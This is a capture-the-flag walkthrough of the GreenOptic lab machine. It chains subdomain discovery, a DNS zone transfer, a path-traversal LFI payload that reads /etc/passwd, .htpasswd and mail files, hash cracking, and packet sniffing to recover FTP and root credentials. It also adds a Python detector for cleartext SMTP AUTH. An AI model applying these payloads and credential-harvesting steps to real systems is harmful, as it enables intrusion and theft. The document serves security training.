This includes finding hidden subdomains, then exploiting an LFI to extract credentials stored in a pcap file, and finally gaining root by analyzing traffic flowing in the network. This is an amazing machine and requires out-of-the-box thinking. I've added the IP to my hosts file, so let's begin!
root@kali:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.1.136 greenoptic.vm
I started the enumeration by starting a port scan with Nmap, checking for open ports and default scripts.
root@kali:~# nmap -sC -sV -oN nmap/initial greenoptic.vm
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for greenoptic.vm (192.168.1.136)
Host is up (0.00086s latency).
Not shown: 995 filtered ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.2
22/tcp    open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 46:20:32:ed:f0:74:11:ed:fd:a7:a4:17:ab:f6:f0:21 (RSA)
|   256 b6:fb:64:10:39:0e:f9:be:8b:5a:d0:d2:41:3e:67:68 (ECDSA)
|_  256 24:27:0b:c9:35:5f:27:7e:1a:82:73:e0:69:cc:0f:96 (ED25519)
53/tcp    open  domain  ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
| dns-nsid:
|_  bind.version: 9.11.4-P2-RedHat-9.11.4-16.P2.el7_8.6
80/tcp    open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: GreenOptic
10000/tcp open  http    MiniServ 1.953 (Webmin httpd)
|_http-server-header: MiniServ/1.953
|_http-title: Site doesn't have a title (text/html; Charset=utf-8).
MAC Address: 08:00:27:C2:D9:39 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.55 seconds
We can see many open ports, so let's go through them one by one.
- Port 21 FTP - We can check whether this allows anonymous login and whether it contains backup files or other useful information.
- Port 22 SSH - In the worst case we can try a brute-force attack if we find a username.
- Port 53 DNS - This seems interesting because it is listening on TCP as well, which is not common. We can look here for misconfigured DNS records such as an open zone transfer.
- Port 80 Apache Web Server - We can try exploiting web vulnerabilities to get a low-privilege shell.
- Port 10000 Webmin MiniServ - This may be exploitable depending on the version and on whether we can obtain login credentials.
I started the enumeration on port 80 first because I find it the easiest. Looking at port 80, we have a website for a company providing broadband services.
I tried looking at the page source and the other links on the website but did not find anything interesting. So next I started a gobuster scan to look for hidden directories.
root@kali:~# gobuster dir -u http://greenoptic.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://greenoptic.vm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
Starting gobuster
===============================================================
/index.html (Status: 200)
/img (Status: 301)
/account (Status: 301)
/css (Status: 301)
/js (Status: 301)
/LICENSE.txt (Status: 200)
/statement.html (Status: 200)
===============================================================
Finished
===============================================================
I went to the /account directory and found a login page. I tried logging in with some random usernames and passwords but was unable to log in. However, I noticed an include parameter in the URL that looked interesting.
Let's open it in Burp Suite to see if we can find an LFI vulnerability in this parameter. Set up the Burp proxy in your browser and, after capturing the request, press Ctrl+R to send it to Repeater.
If we replace the cookiewarning value of the include parameter with a typical LFI payload such as ../../../../etc/passwd, the path traverses up out of the /var/www/html directory and the server reads /etc/passwd.
This worked perfectly, but I was still unable to find a way to get a shell using this vulnerability. So I went on with further enumeration.
Getting a Shell on the Box
I went with the Webmin MiniServ running on port 10000. When we try to access it in the browser, we get an error which leaks a subdomain.
I added this hostname to my hosts file and was then able to view the Webmin login page. Unfortunately I found no clues there. So next I started enumerating port 53 to see if I could find other subdomains. Since the DNS server is listening on TCP, I used dig with the axfr query type to request a zone transfer and list all records.
root@kali:~# dig axfr @192.168.1.136 greenoptic.vm

; <<>> DiG 9.16.4-Debian <<>> axfr @192.168.1.136 greenoptic.vm
; (1 server found)
;; global options: +cmd
greenoptic.vm.              3600 IN SOA  websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
greenoptic.vm.              3600 IN NS   ns1.greenoptic.vm.
ns1.greenoptic.vm.          3600 IN A    127.0.0.1
recoveryplan.greenoptic.vm. 3600 IN A    127.0.0.1
websrv01.greenoptic.vm.     3600 IN A    127.0.0.1
greenoptic.vm.              3600 IN SOA  websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
;; Query time: 4 msec
;; SERVER: 192.168.1.136#53(192.168.1.136)
;; WHEN: Fri Jul 31 21:35:26 IST 2020
;; XFR size: 6 records (messages 1, bytes 235)
We see another subdomain named recoveryplan. I quickly added this to my hosts file.
root@kali:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.1.136 greenoptic.vm websrv01.greenoptic.vm recoveryplan.greenoptic.vm
But when I tried opening it in the browser, it asked for a username and a password.
Usually a .htaccess file controls this kind of HTTP basic authentication and a .htpasswd file stores the password hashes. I used the LFI found in the account page to read the .htpasswd file and got a hashed password.
I saved this hash into a text file and used John the Ripper to crack it.
root@kali:~# cat hash.txt
staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
wheeler          (staff)
1g 0:00:00:00 DONE (2020-08-01 08:26) 2.325g/s 30530p/s 30530c/s 30530C/s yellow7..princess94
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Now we can log in to recoveryplan with the username staff and the password wheeler. After logging in, we see phpBB running on the site. phpBB is free, open-source bulletin board software that lets a group of permitted users share messages and announcements.
If we look at the latest post, we see the user discussing the latest attack on their company and sharing a zip file named dpi.zip; the password for this zip file has been emailed to a user named Sam.
After searching on the internet, I found that local mail is stored in the /var/mail directory. So I used Burp Suite again to read the contents of /var/mail/sam through the LFI.
Now I downloaded the zip file and used the password HelloSunshine123 to extract it. After extracting, we get a dpi.pcap file.
root@kali:~# curl http://recoveryplan.greenoptic.vm/dpi.zip -u staff --output dpi.zip
Enter host password for user 'staff':
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 72324  100 72324    0     0  9.8M      0 --:--:-- --:--:-- --:--:-- 9.8M
root@kali:~# unzip dpi.zip
Archive:  dpi.zip
[dpi.zip] dpi.pcap password:
  inflating: dpi.pcap
I opened the file in Wireshark and started analyzing the traffic. While analyzing, I found the FTP credentials for the user Alex, sent in cleartext in the FTP USER and PASS commands.
Often the FTP password is the same as the user's system password, which means we can log in as Alex via SSH using the username alex and the password FwejAASD1 and read the user flag.
root@kali:~# ssh alex@greenoptic.vm
alex@greenoptic.vm's password:
[alex@websrv01 ~]$ cat user.txt
Well done. Now to try and get root access. Think outside of the box!
Rooting this box was easy; we just needed to think outside of the box! I did a lot of enumeration and tried many privilege escalation scripts, but none of them worked. When I checked the id of the user, I found that the user is a member of the wireshark group, which means that Wireshark is installed on the box and this user is allowed to capture packets.
[alex@websrv01 ~]$ id
uid=1002(alex) gid=1002(alex) groups=1002(alex),994(wireshark)
So I exited the shell and logged in again using ssh -X, which enables X11 forwarding so we can run GUI applications over SSH. Then I typed wireshark to open Wireshark.
root@kali:~# ssh -X alex@greenoptic.vm
alex@greenoptic.vm's password:
[alex@websrv01 ~]$ wireshark
After opening Wireshark, I started capturing traffic on the "any" interface and found an SMTP authentication that repeats every few minutes.
On inspecting the packet, we can see the credentials, which are only base64-encoded rather than encrypted.
After decoding the base64 string, we get the password for root.
root@kali:~# echo -n AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28= | base64 -d
rootASfojoj2eozxczzmedlmedASASDKoj3o
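To see why the decoded output runs the username and the password together, and how a defender would spot such credentials in a capture, here is an added Python example that is not part of the original writeup. It decodes the SASL PLAIN blob from the packet above into its NUL-separated fields and scans a constructed SMTP client transcript (the transcript lines are made up for the example) for AUTH PLAIN sent before STARTTLS.

```python
import base64

# Base64 blob exactly as captured in the walkthrough's SMTP AUTH PLAIN packet
CAPTURED_AUTH_PLAIN = "AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28="

# Constructed client-side SMTP transcript (not taken from the pcap)
SAMPLE_SESSION = [
    "EHLO websrv01",
    "AUTH PLAIN " + CAPTURED_AUTH_PLAIN,
    "MAIL FROM:<root@greenoptic.vm>",
]


def decode_sasl_plain(b64: str) -> dict:
    """Decode an RFC 4616 SASL PLAIN message: [authzid] NUL authcid NUL password.
    A terminal does not render the NUL bytes, which is why `base64 -d` above
    showed the username and the password run together."""
    raw = base64.b64decode(b64, validate=True)
    parts = raw.split(b"\x00")
    if len(parts) != 3:
        raise ValueError("not a SASL PLAIN message: expected two NUL separators")
    authzid, authcid, password = (p.decode("utf-8") for p in parts)
    return {"authzid": authzid, "authcid": authcid, "password": password}


def find_cleartext_auth(client_lines) -> list:
    """Walk the client half of an SMTP session and return (user, password)
    pairs sent with AUTH PLAIN before any STARTTLS, i.e. exactly what a
    capture on the wire exposes. Handles the one-line form (AUTH PLAIN <blob>)
    and the two-step form where the blob follows the server's 334 challenge."""
    findings = []
    awaiting_blob = False
    for line in client_lines:
        cmd = line.strip()
        if awaiting_blob:
            creds = decode_sasl_plain(cmd)
            findings.append((creds["authcid"], creds["password"]))
            awaiting_blob = False
            continue
        upper = cmd.upper()
        if upper == "STARTTLS":
            break  # everything after this is encrypted on the wire
        if upper == "AUTH PLAIN":
            awaiting_blob = True
        elif upper.startswith("AUTH PLAIN "):
            creds = decode_sasl_plain(cmd.split(None, 2)[2])
            findings.append((creds["authcid"], creds["password"]))
    return findings
```

The same check applied to a capture like dpi.pcap (after exporting the SMTP client lines) would flag the scheduled job that leaked the root password here; the fix on the server side is to require STARTTLS before AUTH, or to use a dedicated low-privilege mail account.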
Now we can log in as root via SSH using this password and read our flag!
root@kali:~# ssh root@greenoptic.vm
root@greenoptic.vm's password: ASfojoj2eozxczzmedlmedASASDKoj3o
[root@websrv01 ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@websrv01 ~]# cat root.txt
Congratulations on getting root!

[ASCII-art banner: GreenOptic]

You've overcome a series of difficult challenges, so well done!
I'm happy to make my CTFs available for free. If you enjoyed doing the CTF, please leave a comment on my blog at https://security.caerdydd.wales - I will be happy for your feedback so I can improve them and make them more enjoyable in the future.
*********
Kindly place your vote on the poll located here to let me know how difficult you found it: https://security.caerdydd.wales/greenoptic-ctf/
*********
Thanks,
bootlesshacker
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Andrey Prokopenko.